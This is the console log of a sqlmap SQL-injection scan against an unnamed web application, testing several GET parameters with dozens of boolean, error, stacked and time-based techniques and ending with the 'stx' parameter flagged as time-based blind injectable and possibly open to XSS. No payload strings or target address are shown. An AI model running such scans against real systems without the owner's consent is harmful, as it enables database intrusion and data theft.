        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.10.5.3#dev}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:04:42 /2026-05-26/

[16:04:42] [INFO] flushing session file
[16:04:42] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=6fc95fca55d...8f0606f686;e1192aefb64683cc97abb83c71057733=bm90aWNl;2a0d2363701f23f8a75028924a3af643=MTQuNDIuODYuMzE%3D'). Do you want to use those [Y/n] Y
[16:04:43] [INFO] checking if the target is protected by some kind of WAF/IPS
[16:04:44] [INFO] testing if the target URL content is stable
[16:04:44] [INFO] target URL content is stable
[16:04:45] [WARNING] heuristic (basic) test shows that GET parameter 'bo_table' might not be injectable
[16:04:45] [INFO] testing for SQL injection on GET parameter 'bo_table'
[16:04:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:04:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[16:04:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[16:05:00] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[16:05:05] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[16:05:10] [INFO] testing 'Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[16:05:15] [INFO] testing 'SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)'
[16:05:20] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[16:05:20] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[16:05:21] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[16:05:21] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[16:05:21] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause'
[16:05:22] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[16:05:24] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[16:05:27] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[16:05:31] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[16:05:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)'
[16:05:36] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'
[16:05:38] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[16:05:41] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[16:05:43] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[16:05:45] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[16:05:46] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[16:05:46] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Stacking (EXEC)'
[16:05:48] [INFO] testing 'Generic inline queries'
[16:05:48] [INFO] testing 'MySQL inline queries'
[16:05:48] [INFO] testing 'PostgreSQL inline queries'
[16:05:48] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[16:05:48] [INFO] testing 'Oracle inline queries'
[16:05:49] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[16:05:50] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[16:05:52] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[16:05:54] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)'
[16:05:56] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[16:05:58] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[16:06:00] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[16:06:03] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[16:06:05] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[16:06:08] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[16:06:10] [INFO] testing 'Oracle AND time-based blind'
[16:06:13] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[16:06:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[16:06:15] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[16:06:18] [WARNING] GET parameter 'bo_table' does not seem to be injectable
[16:06:18] [WARNING] heuristic (basic) test shows that GET parameter 'sop' might not be injectable
[16:06:18] [INFO] testing for SQL injection on GET parameter 'sop'
[16:06:18] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:06:21] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[16:06:24] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[16:06:26] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[16:06:28] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[16:06:31] [INFO] testing 'Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[16:06:34] [INFO] testing 'SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)'
[16:06:37] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[16:06:37] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[16:06:37] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[16:06:37] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[16:06:38] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause'
[16:06:38] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[16:06:41] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[16:06:43] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[16:06:46] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[16:06:49] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)'
[16:06:51] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'
[16:06:54] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[16:06:57] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[16:06:59] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[16:07:02] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[16:07:02] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[16:07:03] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Stacking (EXEC)'
[16:07:05] [INFO] testing 'Generic inline queries'
[16:07:05] [INFO] testing 'MySQL inline queries'
[16:07:05] [INFO] testing 'PostgreSQL inline queries'
[16:07:05] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[16:07:06] [INFO] testing 'Oracle inline queries'
[16:07:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[16:07:08] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[16:07:10] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[16:07:12] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)'
[16:07:14] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[16:07:16] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[16:07:19] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[16:07:21] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[16:07:24] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[16:07:27] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[16:07:29] [INFO] testing 'Oracle AND time-based blind'
[16:07:32] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[16:07:32] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[16:07:38] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[16:07:43] [WARNING] GET parameter 'sop' does not seem to be injectable
[16:07:44] [WARNING] heuristic (basic) test shows that GET parameter 'sst' might not be injectable
[16:07:44] [INFO] testing for SQL injection on GET parameter 'sst'
[16:07:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:07:47] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[16:07:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[16:07:51] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[16:07:54] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[16:07:57] [INFO] testing 'Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[16:08:00] [INFO] testing 'SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)'
[16:08:03] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[16:08:03] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[16:08:03] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[16:08:03] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[16:08:04] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause'
[16:08:04] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[16:08:07] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[16:08:09] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[16:08:12] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[16:08:15] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)'
[16:08:18] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'
[16:08:20] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[16:08:23] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[16:08:26] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[16:08:29] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[16:08:29] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[16:08:29] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Stacking (EXEC)'
[16:08:31] [INFO] testing 'Generic inline queries'
[16:08:31] [INFO] testing 'MySQL inline queries'
[16:08:31] [INFO] testing 'PostgreSQL inline queries'
[16:08:32] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[16:08:32] [INFO] testing 'Oracle inline queries'
[16:08:32] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[16:08:34] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[16:08:36] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[16:08:38] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)'
[16:08:40] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[16:08:42] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[16:08:45] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[16:08:48] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[16:08:50] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[16:08:53] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[16:08:56] [INFO] testing 'Oracle AND time-based blind'
[16:08:59] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[16:08:59] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[16:09:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[16:09:10] [WARNING] GET parameter 'sst' does not seem to be injectable
[16:09:10] [WARNING] heuristic (basic) test shows that GET parameter 'sod' might not be injectable
[16:09:10] [INFO] testing for SQL injection on GET parameter 'sod'
[16:09:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:09:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[16:09:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[16:09:17] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[16:09:20] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[16:09:23] [INFO] testing 'Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[16:09:26] [INFO] testing 'SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)'
[16:09:28] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[16:09:29] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[16:09:29] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[16:09:29] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[16:09:29] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause'
[16:09:29] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[16:09:32] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[16:09:35] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[16:09:38] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[16:09:40] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)'
[16:09:43] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'
[16:09:46] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[16:09:48] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[16:09:51] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[16:09:54] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[16:09:55] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[16:09:55] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Stacking (EXEC)'
[16:09:57] [INFO] testing 'Generic inline queries'
[16:09:57] [INFO] testing 'MySQL inline queries'
[16:09:58] [INFO] testing 'PostgreSQL inline queries'
[16:09:58] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[16:09:58] [INFO] testing 'Oracle inline queries'
[16:09:58] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[16:10:01] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[16:10:03] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[16:10:05] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)'
[16:10:07] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[16:10:09] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[16:10:12] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[16:10:15] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[16:10:17] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[16:10:20] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[16:10:23] [INFO] testing 'Oracle AND time-based blind'
[16:10:26] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[16:10:26] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[16:10:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[16:10:37] [WARNING] GET parameter 'sod' does not seem to be injectable
[16:10:37] [WARNING] heuristic (basic) test shows that GET parameter 'sfl' might not be injectable
[16:10:38] [INFO] testing for SQL injection on GET parameter 'sfl'
[16:10:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:10:46] [WARNING] reflective value(s) found and filtering out
[16:10:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[16:10:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[16:10:56] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[16:11:05] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[16:11:14] [INFO] testing 'Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[16:11:21] [INFO] testing 'SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON)'
[16:11:30] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[16:11:31] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[16:11:32] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[16:11:32] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[16:11:33] [INFO] testing 'PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause'
[16:11:33] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[16:11:36] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[16:11:39] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[16:11:42] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[16:11:45] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT)'
[16:11:48] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)'
[16:11:51] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[16:11:54] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[16:11:57] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[16:11:59] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[16:12:00] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[16:12:00] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Stacking (EXEC)'
[16:12:02] [INFO] testing 'Generic inline queries'
[16:12:02] [INFO] testing 'MySQL inline queries'
[16:12:03] [INFO] testing 'PostgreSQL inline queries'
[16:12:03] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[16:12:03] [INFO] testing 'Oracle inline queries'
[16:12:03] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[16:12:06] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[16:12:08] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[16:12:10] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)'
[16:12:12] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[16:12:14] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[16:12:17] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[16:12:20] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[16:12:23] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[16:12:26] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[16:12:29] [INFO] testing 'Oracle AND time-based blind'
[16:12:31] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[16:12:32] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[16:12:35] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[16:12:38] [WARNING] GET parameter 'sfl' does not seem to be injectable
[16:12:38] [INFO] heuristic (basic) test shows that GET parameter 'stx' might be injectable (possible DBMS: 'MySQL')
[16:12:38] [INFO] heuristic (XSS) test shows that GET parameter 'stx' might be vulnerable to cross-site scripting (XSS) attacks
[16:12:38] [INFO] testing for SQL injection on GET parameter 'stx'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (2) and risk (1) values? [Y/n] Y
[16:12:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:12:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[16:12:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[16:12:53] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[16:12:54] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[16:12:54] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[16:12:55] [INFO] testing 'Generic inline queries'
[16:12:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[16:13:06] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[16:13:15] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[16:13:27] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[16:13:57] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[16:14:22] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[16:14:41] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[16:15:03] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[16:15:20] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[16:15:42] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[16:16:02] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[16:16:03] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[16:16:03] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[16:16:04] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[16:16:04] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[16:16:05] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[16:16:05] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[16:16:06] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[16:16:08] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[16:16:08] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[16:16:08] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[16:16:23] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[16:16:23] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[16:16:38] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[16:16:53] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[16:17:07] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[16:17:22] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[16:17:36] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[16:17:51] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[16:18:05] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[16:18:18] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[16:18:33] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[16:18:49] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[16:19:03] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[16:19:21] [INFO] testing 'MySQL >= 5.0 (inline) error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[16:19:22] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[16:19:38] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[16:19:55] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[16:20:11] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[16:20:33] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[16:20:41] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[16:20:53] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[16:20:53] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[16:20:54] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[16:20:54] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[16:20:54] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[16:20:54] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[16:20:55] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[16:20:55] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[16:20:56] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[16:20:57] [INFO] testing 'MySQL >= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET)'
[16:20:57] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[16:20:58] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[16:20:59] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[16:21:00] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[16:21:00] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[16:21:01] [INFO] testing 'MySQL inline queries'
[16:21:02] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[16:21:12] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[16:21:26] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[16:21:35] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[16:21:47] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[16:21:54] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[16:22:05] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[16:22:23] [INFO] GET parameter 'stx' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
